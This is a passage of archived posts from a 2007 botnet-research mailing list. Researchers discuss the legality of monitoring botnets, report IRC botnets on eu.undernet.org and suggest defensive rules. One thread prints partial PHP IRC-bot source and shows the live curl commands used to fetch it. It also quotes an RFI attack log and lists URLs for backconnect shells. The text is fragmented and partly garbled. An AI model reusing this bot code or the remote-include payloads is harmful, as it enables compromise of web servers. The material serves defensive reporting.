http://www.ifn.net/classic/rblstory.htm http://theory.whirlycott.com/~phil/antispam/rbl-bad/rbl-bad.html _ SANSFIRE 2007 July 25-August 2 in Washington, DC. 56 courses, SANS top instructors, and a great tools and solutions expo. Register today! http://www.sans.org/info/4651 (brochure code ISC) ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets -- James Pleger p: 623.298.7966 e: [EMAIL PROTECTED] ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
Re: [botnets] Legalise or Precedent Around Bot Monitoring
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- This is something that I have also been interested in. I would think that controlling bots would be illegal, and would depend on what host was connected to the network. On 6/27/07, Danny McPherson <[EMAIL PROTECTED]> wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Does anyone have pointers to either established precedent, laws, or anecdotal information that one should consider before monitoring botnet C&C activity - primarily from an Application Layer perspective, as opposed to Network and Transport Layer activity? Same applies to actual instructing bots as well, for example to disengage attacking hosts, etc.. I'm interested in information from any region.. Thanks in advance! -danny ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets -- James Pleger p: 623.298.7966 e: [EMAIL PROTECTED] ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Another botnet on eu.undernet.org
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--
I actually found another one while searching:
http://217.172.161.74/solo/kgb.c
$server = "eu.undernet.org";
$chan = "#romulus katana";
$port = '6667';
[11:26:27 bash] [~]
[EMAIL PROTECTED] curl http://217.172.161.74/solo/kgb.c? | grep
include
% Total % Received % Xferd Average Speed Time Time Time
Current
Dload Upload Total Spent Left
Speed
100 22214 100 22214 0 0 23309 0 --:--:-- --:--:--
--:--:-- 39948
include 'http://217.172.161.74/solo/solo';
include 'http://217.172.161.74/solo/xeqt';
[11:26:33 bash] [~]
[EMAIL PROTECTED] curl http://217.172.161.74/solo/xeqt | more
% Total % Received % Xferd Average Speed Time Time Time
Current
Dload Upload Total Spent Left
Speed
17 19559 17 3518 0
error_reporting(0); 0
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);703
6 $safe = @ini_get('safe_mode');
$up = time();
$mn1 = php_uname();0
$mn2 = PHP_OS;
0function randomkeys($length):0
0{:0
2 $pattern = "abcdefghijklmnopqrstuvwxyz"; -
- for($i=0;$i<$length;$i++):-
- {:
-- $key .= $pattern{rand(0,35)};
}0:
0 return $key;0:
0}2
// BYY xeQter70
36
$ip = $_SERVER['REMOTE_ADDR'];
$HTTP_HOST = getenv("HTTP_HOST");
$REQUEST_URI = getenv("REQUEST_URI");
$xeQted = "[x] $HTTP_HOST$REQUEST_URI";
if (@file_exists("/bin/sh")) $pro1="sh$: Yes"; else $pro1="sh$: NO";
if (@file_exists("/usr/bin/wget")) $pro2="WGET: yes"; else $pro2="WGET:
NO";
if (@file_exists("/usr/bin/curl")) $pro3="CURL: yes"; else $pro3="CURL:
NO";
if (@file_exists("/usr/bin/lynx")) $pro4="LYNX: yes" ; else $pro4="LYNX:
NO";
if (@file_exists("/usr/bin/GET")) $pro5="GET: yes"; else $pro5="GET:
No";
if ($safe) $xsafe="Safe_mode: ON"; if (!$safe) $xsafe="safe_mode: OFF";
else $xsafe="Safe_mode: Unknown";
[EMAIL PROTECTED](); [EMAIL PROTECTED](); [EMAIL PROTECTED]();
$phpver = "PHP ".phpversion();
$vhost = "e8ea21c62fc9b75647054059b815d350";
$vhost2 = "7886906c819599697c97aa15d8e37f62";
$vhost3 = 'andone.users.undernet.org';
$identd = randomkeys(4).rand(100,999);
$me = randomkeys(5).rand(100,999);
$ircname = randomkeys(4).rand(100,999);
$version = "ShadowBot v2.4";
$server = "eu.undernet.org";
$quitmsg = "Let it rain";
$chan = "#romulus katana";
$port = '6667';
while(0==0)
{
$ircsock = @fsockopen($server, $port);
if (!$ircsock)
{
echo "SHadow, Exit.\n";
}
if ($ircsock)
{
fputs($ircsock,"USER $identd $me $server :$ircname\r\nNICK
$me\r\n");
$on = time();
while (!feof($ircsock)) {
$rawbuffer = fgets($ircsock, 2048);
$buffer = explode(" ", $rawbuffer);
if( $buffer[0] == 'PING') {
fputs($ircsock,"PONG $buffer[1] \r\n");
}
if( $buffer[1] == '001') {
fputs($ircsock,"JOIN $chan\r\n");
fputs($ircsock,"WHO $me\r\n");
}
if( $buffer[7]." ".$buffer[8]." ".$buffer[9]." ".$buffer[10] ==
'many connections from your' ) {
exit;
}
if( $buffer[1] == '433') {
if (!isset($me2)) {
randomkeys(3).rand(100,999);
fputs($ircsock,"NICK $me\r\n");
}
if (isset($me2)) {
$me = $me2;
unset($me2);
100 19559 100 19559 0 0 24087 0 --:--:-- --:--:--
--:--:-- 51413
[11:26:57 bash] [~]
[EMAIL PROTECTED]
James Pleger
Go Daddy Software, Inc.
[EMAIL PROTECTED]
Desk: 480-505-8800 x4093
Cell: 480-262-7293
This email message and any attachments hereto is intended for use only by the addressee(s) named herein and may contain legally privileged and/or confidential information. If you have received this email in error, please immediately notify the sender and permanently delete the original and any copy of this message and its attachments.
David Vorel wrote:
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--
Hi all,
nice shot Bodik ;] I found different botnet on eu.undernet.org chan #vx8 it's linux
zombie based botnet spreads throught various bugs in PHP. Undernet
admins please take look on it. Description follows. Botnet herders are
Denzel, xeQt, aslpls-.
First attempt:
85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET
/index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132
"-" "libwww-perl/5.79"
We mirror all links included, engine for RFI source is not com
Re: [botnets] Another botnet on eu.undernet.org
{
$key .= $pattern{rand(0,35)};
}
return $key;
}
// BYY xeQter vS TeaMrx - Br0nx
$ip = $_SERVER['REMOTE_ADDR'];
$HTTP_HOST = getenv("HTTP_HOST");
$REQUEST_URI = getenv("REQUEST_URI");
$xeQted = "[x] $HTTP_HOST$REQUEST_URI";
if (@file_exists("/bin/sh")) $pro1="sh$: Yes"; else $pro1="sh$: NO";
if (@file_exists("/usr/bin/wget")) $pro2="WGET: yes"; else $pro2="WGET:
NO";
if (@file_exists("/usr/bin/curl")) $pro3="CURL: yes"; else $pro3="CURL:
NO";
if (@file_exists("/usr/bin/lynx")) $pro4="LYNX: yes" ; else
$pro4="LYNX: NO";
if (@file_exists("/usr/bin/GET")) $pro5="GET: yes"; else $pro5="GET:
No";
if ($safe) $xsafe="Safe_mode: ON"; if (!$safe) $xsafe="safe_mode: OFF";
else $xsafe="Safe_mode: Unknown";
[EMAIL PROTECTED](); [EMAIL PROTECTED](); [EMAIL PROTECTED]();
$phpver = "PHP ".phpversion();
$vhost = "e8ea21c62fc9b75647054059b815d350";
$vhost2 = "7886906c819599697c97aa15d8e37f62";
$vhost3 = 'xeQt.users.undernet.org';
$identd = randomkeys(4).rand(100,999);
$me = randomkeys(5).rand(100,999);
$ircname = randomkeys(4).rand(100,999);
$version = "TeaMrx v1.0";
$server = "eu.undernet.org";
$quitmsg = "xeQt vS TeaMrx";
$chan = "#vx8";
$port = '6667';
while(0==0)
{
$ircsock = @fsockopen($server, $port);
James Pleger
Go Daddy Software, Inc.
[EMAIL PROTECTED]
Desk: 480-505-8800 x4093
Cell: 480-262-7293
This email message and any attachments hereto is intended for use only by the addressee(s) named herein and may contain legally privileged and/or confidential information. If you have received this email in error, please immediately notify the sender and permanently delete the original and any copy of this message and its attachments.
David Vorel wrote:
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--
Hi all,
nice shot Bodik ;] I found different botnet on eu.undernet.org chan #vx8 it's linux
zombie based botnet spreads throught various bugs in PHP. Undernet
admins please take look on it. Description follows. Botnet herders are
Denzel, xeQt, aslpls-.
First attempt:
85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET
/index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132
"-" "libwww-perl/5.79"
We mirror all links included, engine for RFI source is not completed
yet, so for this time I send row urls.
http://nawader.org/modules/Top/kgb.c
http://www.honeynet.cz/bots/5249235d1476c24250130da98b9a34b5.txt
- PHP shell which includes other links
http://nawader.org/modules/Top/bc.txt
http://www.honeynet.cz/bots/4456038f56e4b71b01ed0a348cbfeb41.txt
- Backconnect shell
http://nawader.org/modules/Top/n.txt
http://www.honeynet.cz/bots/adc704f9697cdf89da9d503b11f9787d.txt
- Shellbot I, connect to eu.undernet.org #vx8
http://nawader.org/modules/Top/teamrx
http://www.honeynet.cz/bots/68f984e9f37e3911b92493cbb9b04aef.txt
- Loader for n.txt and bc.txt run backconnect and send shell to
220.232.137.199 and 64.38.11.130
http://nawader.org/modules/Top/toyo.txt
http://www.honeynet.cz/bots/80d97c973062d7d2d369f5f79578a597.txt
- Shellbot II, connect to eu.undernet.org #vx8
All scripts are labelled "xeQt vS TeaMrx".
Who on chan:
http://www.honeynet.cz/trash/list
After while on channel bot herders move bots to another chan.
#vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI
#vx8 :<@xeQt> !x !join #mp3fulls 209x5Vi.
Here is list from uname -sr.
http://www.honeynet.cz/trash/uname
chat:
:[EMAIL PROTECTED] PRIVMSG #vx8 :im no geek i tould
u
:[EMAIL PROTECTED] PRIVMSG #vx8 :im a criminal
:[EMAIL PROTECTED] PRIVMSG #vx8 :make shit
<< PRIVMSG #vx8 :i now that you are criminal
<< PRIVMSG #vx8 :but still on free ?
:[EMAIL PROTECTED] PRIVMSG #vx8 :nothings free
:[EMAIL PROTECTED] PRIVMSG #vx8 :$$
<< PRIVMSG xeQt :^AVERSION^A
:[EMAIL PROTECTED] NOTICE nirgil :^AVERSION mIRC
v6.17 Khaled Mardam-Bey^A
:[EMAIL PROTECTED] PRIVMSG #vx8 :its my life
<< PRIVMSG #vx8 :jail is for free
:[EMAIL PROTECTED] PRIVMSG #vx8 :i know
:[EMAIL PROTECTED] PRIVMSG #vx8 :im going sooon
<< PRIVMSG #vx8 :y are waiting for ?
:[EMAIL PROTECTED] PRIVMSG #vx8 :its full
:[EMAIL PROTECTED] PRIVMSG #vx8 :a few months
:[EMAIL PROTECTED] PRIVMSG #vx8 :im no murder, so i
goto wait
:[EMAIL PROTECTED] PRIVMSG #vx8 :thats a trickey one
:[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont touch
any of the servers
<< PRIVMSG #vx8 :when u installed your script throught bug in php that's
touching too
Re: [botnets] defacements for the installation of malcode (Gadi Evron)
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- What I have seen is that a good majority of the C&C's are running on dedicated hosts that might have been set up fraudulently, or that have been compromised. As far as the clients of these C&C's it really depends on what the attacker is targeting... If he is targeting the new windows vulnerability, then there will be lots of end users that are on the botnet, which are directly connected to the Internet. Some of the bots that come from major businesses appear to be from accidental downloads of malware. Running a C&C on a major businesses network is more hassle than it is worth for the attacker, as you would have to compromise the host, deal with firewalls, and the C&C would be shut down fairly quickly(hours, instead of days or weeks). Just my 2 cents. Adriel T. Desuatels wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- List, I have a team that has been performing research against information collected from shadowserver. So far I'm seeing that bots are not compromising major businesses, but do have a significant indirect negative impact on those businesses. Has anyone seen bot coming from IP addresses registered to major businesses? Has anyone seen C&C servers installed on networks run by major businesses? Or, are these compromises mostly smaller businesses and home users? On 2/16/07 6:43 PM, "Tom" <[EMAIL PROTECTED]> wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Wed, 14 Feb 2007, Jeremy Epstein wrote: There was also a really entertaining presentation from Patrick Petersen of IronPort at RSA, in which he mentioned use of defaced web sites as proxy forwarders for spammers. According to the presentation, the spammers have a fairly sophisticated toolkit that takes over the site and turns it into a pharmacy (or whatever) redirect site. A different goal from the Websense presentation, but still a purpose other than simple defacement. Indeed. I can post some screenshots of some of these tools if you are interested in them. Anon remailers, spam tools, etc. More and more spam is being sent using web servers. I am looking for someone to volunteer to create spam assasin rules based on how these tools send mail. Rules are easy when either you don't have it installed or you are proactive and installed it in a non default location which is what we do. I have a couple of rules based upon log analysis and can probably generate more but can't you just use: http://bleedingthreats.net/bleeding-web.rules http://bleedingthreats.net/bleeding-exploit.rules http://bleedingthreats.net/bleeding-attack_response.rules Tom ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Web Server Botnets and Server Farms as Attack Platforms
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- I saw it come in like 5 times at 10:58 am, and 2 times at 9:20am on 2/16. John G. wrote: > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > -- > is it just me, or has Tom's reply come through three or more time so far? > > From: Tom <[EMAIL PROTECTED]> > Subject: Re: [botnets] Web Server Botnets and Server Farms as Attack > Platforms > > > John G. > > I GoodSearch for Warren J. Plaut Charitable Trust > Raise money for your favorite charity or school just by searching the > Internet with GoodSearch - www.goodsearch.com - powered by Yahoo! > > > > > Don't get soaked. Take a quick peak at the forecast > with the Yahoo! Search weather shortcut. > http://tools.search.yahoo.com/shortcuts/#loc_weather > ___ > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > All list and server information are public and available to law enforcement > upon request. > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets > > > ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
